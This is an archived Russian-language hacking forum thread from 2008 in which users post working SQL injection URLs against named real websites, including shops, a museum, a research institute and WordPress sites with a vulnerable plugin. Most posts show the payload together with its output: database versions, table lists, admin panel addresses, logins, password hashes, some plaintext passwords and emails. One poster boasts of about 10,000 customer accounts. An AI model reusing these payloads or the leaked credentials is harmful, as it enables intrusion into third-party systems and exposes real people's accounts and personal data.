ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.02.2008, 04:17
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
мускул инж
http://islamlib.com/id/index.php?page=article&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27+from+users/*
|
|
|
02.02.2008, 21:31
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от WuWu
Код HTML:
http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
4.0.27-standard-log
i-shop@localhost
I-shop
PHP код:
http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat(login,0x3a,pass,0x3a,email),3,id,5+from+customers/*
10k акков... надеюсь, никто не пострадает 
|
|
|
|
02.02.2008, 22:37
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
http://www.a*i*n*a*u*d*i*o.l*v/index.php?item=92&cat=-18+union+select+concat_ws(0x3a,id,email,pwd,valida tion_key,valid,created,phone,fullname,lastvisit,pa y_vat,type_pers,bill_to,ship_to),2+from+users+limi t+6,1/*
для просмотра меняем лимиты
Последний раз редактировалось bobob; 02.02.2008 в 22:42..
|
|
|
|
02.02.2008, 23:30
|
|
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171
Репутация:
88
|
|
Искал аккорды на гитару нашёл скулю))
Довольно хитрая фильтрация, без ковычки перед union ничего не пашет
Код:
http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+password+from+mysql.user/*
root: 46b0f804077918b1
*d450d21dcc39df8471df867995cec28cb04061bf
Пятая ветка, таблицы выкладываются сразу все списком
Код:
http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+Table_name+from+information_schema.tables/*
|
|
|
|
02.02.2008, 23:41
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.aiim.org/standards.asp?id=-1+or+1=@@version--
Microsoft SQL Server 7.00 - 7.00.961 (Intel X86) Oct 24 2000 18:39:12 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.aiim.org/standards.asp?id=-1+or+1=(select+system_user)--
aiimwebuser
http://www.aiim.org/standards.asp?id=-1+or+1=(select+db_name())--
CGIWEB
-----------------------------------------------------------------------------
lisenok.ru
http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5/*
5.0.45-log/liseno_liseno/liseno_liseno@localhost
http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password ),5+from+users/*
логин/пароль
lis/skyweb
---------------------------------------------------------------------------
allurent.com
http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user()),9,10,11,12/*
4.1.20/allurent_prod_12507/allurent@localhost
http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,user,P assword),9,10,11,12+from+mysql.user/*
root/
http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,name,p assword),9,10,11,12+from+users/*
имя/пароль
allurite/d1fnt. pW*rD
|
|
|
|
03.02.2008, 02:24
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
http://pechatnick.com
version(): 5.0.45-log
user(): u8421@10.10.223.234 (masterhost; phpmyadmin.masterhost.ru; wmail.masterhost.ru)
Код:
http://pechatnick.com/users/index.phtml?uid=-1+union+select+concat_ws(0x3a,user_id,name,login,email,skype,pass,icq)+from+users+limit+0,1/*
админка: http://pechatnick.com/_admin/
login: tanya
pass: xxx
Последний раз редактировалось Basurman; 03.02.2008 в 02:27..
|
|
|
|
03.02.2008, 02:44
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
nmspacemuseum.org
Код:
http://www.nmspacemuseum.org/content.php?id=21'%20union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+limit+1,1+--+
4.1.20�nmspacemuseum@localhost�nmspacemuseum_live
Код:
http://www.nmspacemuseum.org/content.php?id=21'+union+select+1,concat_ws(0x3,user_name,user_pass,user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit+1,1+--+
admin�NMMSH-01�doug.patinka@state.nm.us
Админка: http://www.nmspacemuseum.org/admin/index.php
|
|
|
|
03.02.2008, 02:50
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
Код HTML:
http://www.photopips.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://www.zulan.se/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://www.pie2020.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://www.ilmanakbar.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Код HTML:
http://localize.org.ua/old/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
Много хешей, не стал шифровать...
Код HTML:
http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
5.0.33-standard
zona@10.0.0.1
zona
Код HTML:
http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,table_name,3,4,5+from+information_schema.tables/*
несколько интересных таблиц
Последний раз редактировалось WuWu; 03.02.2008 в 03:45..
|
|
|
|
03.02.2008, 15:05
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Код:
http://www.frontnational.com/communique_detail.php?id=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4/*
frontnatfn:frontnatfn@10.0.61.118:5.0.44-log
Код:
http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4/*
5.0.22-Debian_0ubuntu6.06.5-log
находим интересные таблицы, типа t_admins
и собственно там и находим админа
Код:
http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,3,concat(username,0x3a,passwd),5,6,7,8,9,0,1,2,3,4+from+telma2.t_admins/*
admin:21232f297a57a5a743894a0e4a801fc3
bettina:ACB4A77114F483CE965A7D55A61D0E4B
судя по базе log: pass
admin:admin 
Последний раз редактировалось Sharingan; 03.02.2008 в 15:07..
|
|
|
|
03.02.2008, 21:06
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.coreyholms.com/portfolio/project.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9/*
4.1.20/coreyholms_db1/coreyholms@localhost
-----------------------------------------------------------------------------
taylormarsh.com
http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,version (),database(),user()),8,9/*
4.1.20/taylormarsh/taylormarsh@localhost
http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,usernam e,password,email),8,9+from+users/*
логин/хеш/мейл
tmarsh/959b43c9d1b14f6281eceea6e1762370/taylor@taylormarsh.com
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
